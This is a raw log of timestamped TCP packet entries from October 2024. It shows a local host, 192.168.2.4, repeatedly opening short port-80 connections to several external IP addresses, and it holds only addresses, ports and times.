                                                                                                                            Oct 19, 2024 12:58:22.787497044 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:27.867402077 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:27.872241974 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:27.872315884 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:27.886468887 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:27.891267061 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004385948 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004410028 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004421949 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004431009 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004493952 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:29.004607916 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:29.004755020 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004858017 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:29.389502048 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:30.409105062 CEST5002980192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:30.413989067 CEST8050029199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:30.414062023 CEST5002980192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:30.428373098 CEST5002980192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:30.433374882 CEST8050029199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:31.054749966 CEST8050029199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:31.054819107 CEST8050029199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:31.054944038 CEST5002980192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:31.055402040 CEST8050029199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:31.055505991 CEST5002980192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:31.936460018 CEST5002980192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:32.957820892 CEST5003080192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:32.964037895 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.964167118 CEST5003080192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:32.979406118 CEST5003080192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:32.984477043 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984503031 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984761953 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984772921 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984781981 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984790087 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984800100 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984808922 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:32.984826088 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:33.656591892 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:33.656622887 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:33.656634092 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:33.656657934 CEST8050030199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:33.656681061 CEST5003080192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:33.656734943 CEST5003080192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:34.483418941 CEST5003080192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:35.503412008 CEST5003180192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:35.508461952 CEST8050031199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:35.508661032 CEST5003180192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:35.516201973 CEST5003180192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:35.521040916 CEST8050031199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:36.149228096 CEST8050031199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:36.149247885 CEST8050031199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:36.149413109 CEST5003180192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:36.149727106 CEST8050031199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:36.149780035 CEST5003180192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:36.153106928 CEST5003180192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:36.157871008 CEST8050031199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.288436890 CEST5003280192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:41.293443918 CEST8050032172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.293690920 CEST5003280192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:41.305579901 CEST5003280192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:41.310406923 CEST8050032172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.958129883 CEST8050032172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.958148003 CEST8050032172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.958209991 CEST5003280192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:41.959985018 CEST8050032172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.960037947 CEST5003280192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:42.814013958 CEST5003280192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:43.832010031 CEST5003380192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:43.837027073 CEST8050033172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:43.837101936 CEST5003380192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:43.851504087 CEST5003380192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:43.856327057 CEST8050033172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:44.515961885 CEST8050033172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:44.518013000 CEST8050033172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:44.518081903 CEST5003380192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:45.361861944 CEST5003380192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:46.378226042 CEST5003480192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:46.383176088 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.383255005 CEST5003480192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:46.396898985 CEST5003480192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:46.401815891 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.401830912 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.401853085 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.401866913 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.401882887 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.402043104 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.402055025 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.402101994 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:46.402113914 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:47.125828028 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:47.127578974 CEST8050034172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:47.127682924 CEST5003480192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:47.905019999 CEST5003480192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:48.929202080 CEST5003580192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:48.934189081 CEST8050035172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:48.934401989 CEST5003580192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:48.941499949 CEST5003580192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:48.946371078 CEST8050035172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:49.609735966 CEST8050035172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:49.609761000 CEST8050035172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:49.612890005 CEST8050035172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:49.613095045 CEST5003580192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:49.627794027 CEST5003580192.168.2.4172.67.196.90
                                                                                                                            Oct 19, 2024 12:58:49.632594109 CEST8050035172.67.196.90192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:54.659321070 CEST5003680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:54.664171934 CEST80500363.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:54.667403936 CEST5003680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:54.679333925 CEST5003680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:54.684154034 CEST80500363.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:55.283765078 CEST80500363.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:55.287439108 CEST5003680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:56.186933994 CEST5003680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:56.191935062 CEST80500363.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:57.207326889 CEST5003780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:57.212387085 CEST80500373.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:57.212492943 CEST5003780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:57.223731995 CEST5003780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:57.228673935 CEST80500373.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:57.831686974 CEST80500373.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:57.831784010 CEST5003780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:58.734532118 CEST5003780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:58.739440918 CEST80500373.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.752927065 CEST5003880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:59.757872105 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.757962942 CEST5003880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:59.770391941 CEST5003880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:59.775321960 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775336981 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775356054 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775363922 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775367975 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775491953 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775509119 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775568008 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:59.775577068 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:00.399142981 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:00.399260044 CEST5003880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:01.280679941 CEST5003880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:01.285531998 CEST80500383.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:02.300292969 CEST5003980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:02.305399895 CEST80500393.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:02.305488110 CEST5003980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:02.315072060 CEST5003980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:02.319926977 CEST80500393.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:02.923027039 CEST80500393.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:02.923620939 CEST80500393.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:02.923815966 CEST5003980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:02.927311897 CEST5003980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:02.932467937 CEST80500393.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:07.961457968 CEST5004080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:07.966419935 CEST80500403.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:07.966495991 CEST5004080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:07.984530926 CEST5004080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:07.989568949 CEST80500403.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:09.146131039 CEST80500403.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:09.146199942 CEST80500403.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:09.146276951 CEST5004080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:09.146533966 CEST80500403.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:09.146612883 CEST5004080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:09.498648882 CEST5004080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:09.503485918 CEST80500403.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:10.517961025 CEST5004180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:10.522957087 CEST80500413.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:10.523044109 CEST5004180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:10.535514116 CEST5004180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:10.540386915 CEST80500413.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:12.045608997 CEST5004180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:12.051301956 CEST80500413.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:12.051357985 CEST5004180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:13.067286968 CEST5004280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:13.072247028 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.075443983 CEST5004280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:13.087300062 CEST5004280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:13.092305899 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092327118 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092379093 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092453957 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092514992 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092524052 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092531919 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092567921 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.092576981 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.710830927 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:13.710882902 CEST5004280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:14.592389107 CEST5004280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:14.597336054 CEST80500423.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:15.611449957 CEST5004380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:15.616434097 CEST80500433.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:15.621433020 CEST5004380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:15.625636101 CEST5004380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:15.630528927 CEST80500433.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:16.263792038 CEST80500433.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:16.264565945 CEST80500433.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:16.264611006 CEST5004380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:16.266953945 CEST5004380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:16.271826029 CEST80500433.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:21.307214975 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:21.312205076 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:21.312340021 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:21.323249102 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:21.329225063 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:22.826778889 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:22.951355934 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:22.954823017 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:23.074651003 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:23.074748039 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.847356081 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.852324009 CEST80500453.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:23.852392912 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.867810011 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.873613119 CEST80500453.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:25.373667002 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:25.378873110 CEST80500453.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:25.381503105 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.407331944 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.412306070 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.412389994 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.439686060 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.444586992 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444639921 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444648981 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444657087 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444669008 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444787025 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444796085 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444806099 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444814920 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:27.045386076 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:27.045458078 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:27.951888084 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:27.956768036 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:28.997345924 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.002386093 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.005743027 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.056119919 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.061269045 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.646204948 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.646998882 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.649501085 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.653552055 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.658318043 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:35.636054993 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:35.640955925 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:35.641405106 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:35.653805971 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:35.658624887 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:36.625159025 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:36.814327955 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:36.817387104 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:37.154849052 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.175065041 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.180269957 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:38.180372953 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.195497990 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.200767040 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:39.134040117 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:39.187203884 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:39.315416098 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:39.315587997 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:39.701786995 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:40.721272945 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:41.146348953 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.149580002 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:41.161271095 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:41.166157961 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166168928 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166178942 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166197062 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166204929 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166383982 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166392088 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166445971 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166455030 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:42.105974913 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:42.151328087 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:42.290198088 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:42.290270090 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:42.670588017 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.689361095 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.694442987 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:43.694597006 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.702356100 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.707155943 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:44.676678896 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:44.717271090 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:44.860420942 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:44.862402916 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:44.862402916 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:44.867233038 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.279336929 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:50.284537077 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.284612894 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:50.297528982 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:50.302376032 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.923250914 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.927787066 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:51.843746901 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:51.848647118 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:52.862771988 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:52.872828960 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:52.872935057 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:52.883503914 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:52.888540983 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:53.524760008 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:53.527213097 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:54.389980078 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:54.396962881 CEST805005384.32.84.32192.168.2.4
